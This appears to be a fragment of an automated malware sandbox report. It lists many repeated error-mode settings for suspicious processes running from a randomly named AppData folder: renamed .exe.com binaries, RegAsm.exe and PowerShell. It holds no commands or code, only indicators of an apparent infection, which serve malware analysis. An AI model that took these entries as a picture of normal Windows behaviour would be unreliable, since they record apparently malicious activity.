Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
